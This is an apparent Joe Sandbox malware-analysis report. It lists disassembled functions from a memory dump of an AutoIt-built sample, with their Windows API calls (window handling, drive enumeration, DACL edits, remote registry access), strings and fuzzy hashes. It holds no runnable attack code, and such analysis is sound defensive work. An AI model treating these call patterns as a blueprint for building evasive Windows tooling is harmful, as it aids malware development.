                                                                                                                                                                                                                                                                                                        • Instruction ID: d78701234e39f8f2a8a1c3056f6d8eb618a9f1f1b815391193a6625e2244c432
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efa5a1eb426b791f90e1dd66416a78dbe0554bae536d114946dbc860fd93362c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5A182B5108305BFD7219FA4DD88E6B7BE9FB48320F100A29FAE2961D0D776D944CB91
                                                                                                                                                                                                                                                                                                        Function 00FB1625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00FB16B4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FF2B07
                                                                                                                                                                                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FF2B40
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FF2F85
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB1488,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FB1865
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00FF2FC1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FF2FD8
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF2FEE
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF2FF9
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: d3a098e9da68bb963dfbce8b5fe336ea9b68cf579ede783dfa961a8635660967
                                                                                                                                                                                                                                                                                                        • Instruction ID: f266efb96c76236f530111cd9e02d0f2f797d8b1f476bf8f18a6efe984bc4cba
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3a098e9da68bb963dfbce8b5fe336ea9b68cf579ede783dfa961a8635660967
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC12BA34A04205AFC775CF14C995BBAB7E2BF44320F584169E6859B261CB36E882EF91
                                                                                                                                                                                                                                                                                                        Function 0103316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0103319B
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 010332C7
                                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 01033306
                                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 01033316
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0103335D
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 01033369
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 010333B2
                                                                                                                                                                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 010333C1
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 010333D1
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 010333D5
                                                                                                                                                                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 010333E5
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010333EE
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 010333F7
                                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01033423
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0103343A
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0103347A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0103348E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0103349F
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 010334D4
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 010334DF
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010334EA
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 010334F4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                        • Opcode ID: 359da227b6180e7840b191ca73c798b67727d5096485a0e0222f02089d02b54d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 84704e230f75094f74c5c1b9c83c5997a988702837b6253abf33b00729b41c41
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 359da227b6180e7840b191ca73c798b67727d5096485a0e0222f02089d02b54d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B140B5A00205AFEB24DFA9CD85FAE7BB9FB48710F008114FA55EB290D775E940CB94
                                                                                                                                                                                                                                                                                                        Function 01025524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 01025532
                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,0104DC30,?,\\.\,0104DCD0), ref: 0102560F
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,0104DC30,?,\\.\,0104DCD0), ref: 0102577B
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                        • Opcode ID: de1f21e7562bd9c6696a98562ca5fd5c2d9046d361ed5189c17bdfb11beb4271
                                                                                                                                                                                                                                                                                                        • Instruction ID: ceb15bb08fc8589e0fc9099557919d5a1207290d9e616932da25cab2ceabc820
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de1f21e7562bd9c6696a98562ca5fd5c2d9046d361ed5189c17bdfb11beb4271
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1611E31A80219EBC724EF29DE998FCB7B0FF18290B148099E4C6AF211D735ED01DB49
                                                                                                                                                                                                                                                                                                        Function 01041A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01041BC4
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 01041BD9
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 01041BE0
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01041C35
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 01041C55
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01041C89
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01041CA7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01041CB9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 01041CCE
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01041CE1
                                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 01041D3D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 01041D58
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 01041D6C
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01041D84
                                                                                                                                                                                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 01041DAA
                                                                                                                                                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 01041DC4
                                                                                                                                                                                                                                                                                                        • CopyRect.USER32(?,?), ref: 01041DDB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 01041E46
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                        • Opcode ID: eb0757704dedaac18fb20a06461e6d375497717f83add4b3dbec4d525dbc1c70
                                                                                                                                                                                                                                                                                                        • Instruction ID: 776801047756232beb68c2b036ad1c71f115e5b8258904f0c0b778298f172c94
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb0757704dedaac18fb20a06461e6d375497717f83add4b3dbec4d525dbc1c70
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13B19BB1604301AFD750DF69C985B9ABBE5FF88310F00896CF5D99B291C735E844CBA2
                                                                                                                                                                                                                                                                                                        Function 01040CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 01040D81
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01040DBB
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01040E25
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01040E8D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01040F11
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01040F61
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01040FA0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCFD52: _wcslen.LIBCMT ref: 00FCFD5D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01012BA5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01012BD7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                        • Opcode ID: d42e2130712d80ba334e2788bee146511017463d20ca3b10c99a77d1bffc15b3
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd5aec730e86fb5438813cabefa07faebf60821dfaba5bd8b3f5becca0eadea1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d42e2130712d80ba334e2788bee146511017463d20ca3b10c99a77d1bffc15b3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6E1F2B16083418FC714DF29C9908AEB7E2BF84314B04896DF9D6AB3A6D734ED45CB81
                                                                                                                                                                                                                                                                                                        Function 00FB2521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB25F8
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00FB2600
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB262B
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00FB2633
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00FB2658
                                                                                                                                                                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FB2675
                                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FB2685
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB26B8
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FB26CC
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00FB26EA
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00FB2706
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB2711
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetCursorPos.USER32(?), ref: 00FB19E1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: ScreenToClient.USER32(00000000,?), ref: 00FB19FE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000001), ref: 00FB1A23
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000002), ref: 00FB1A3D
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00FB199C), ref: 00FB2738
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5dd1e6f73a42c46d486c4049a6f256e2f2de64414b29027d93820ed69559e28f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6649b57337c86a757d52430e6fd2808225dcd6aa664c99bff5203fde66cc11e2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dd1e6f73a42c46d486c4049a6f256e2f2de64414b29027d93820ed69559e28f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DB19A75A002099FDB24DFA8CD85BEE3BB1FB48324F104219FA85A7294DB78E940DF51
                                                                                                                                                                                                                                                                                                        Function 010116D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011A60
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A6C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A82
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01011A99
                                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01011741
                                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01011775
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0101178C
                                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 010117C6
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010117E2
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 010117F9
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01011801
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01011808
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01011829
                                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 01011830
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0101185F
                                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01011881
                                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01011893
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010118BA
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010118C1
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010118CA
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010118D1
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010118DA
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010118E1
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010118ED
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010118F4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: GetProcessHeap.KERNEL32(00000008,010114FD,?,00000000,?,010114FD,?), ref: 01011AED
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,010114FD,?), ref: 01011AF4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,010114FD,?), ref: 01011B03
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1fbf10e1f8faa21d0ad5253c6554ea274f3cb1add7b1876c3119d8707843c2ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3ac7ee39cc1f62569be66eb91b923eaad4fca12bbef1b22f35e54ed192855c87
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fbf10e1f8faa21d0ad5253c6554ea274f3cb1add7b1876c3119d8707843c2ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF7170B5D00209ABEB10DFF4ED84FEEBBB8BF44240F148155FA94A7194D7399905CB60
                                                                                                                                                                                                                                                                                                        Function 0103CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103CF1D
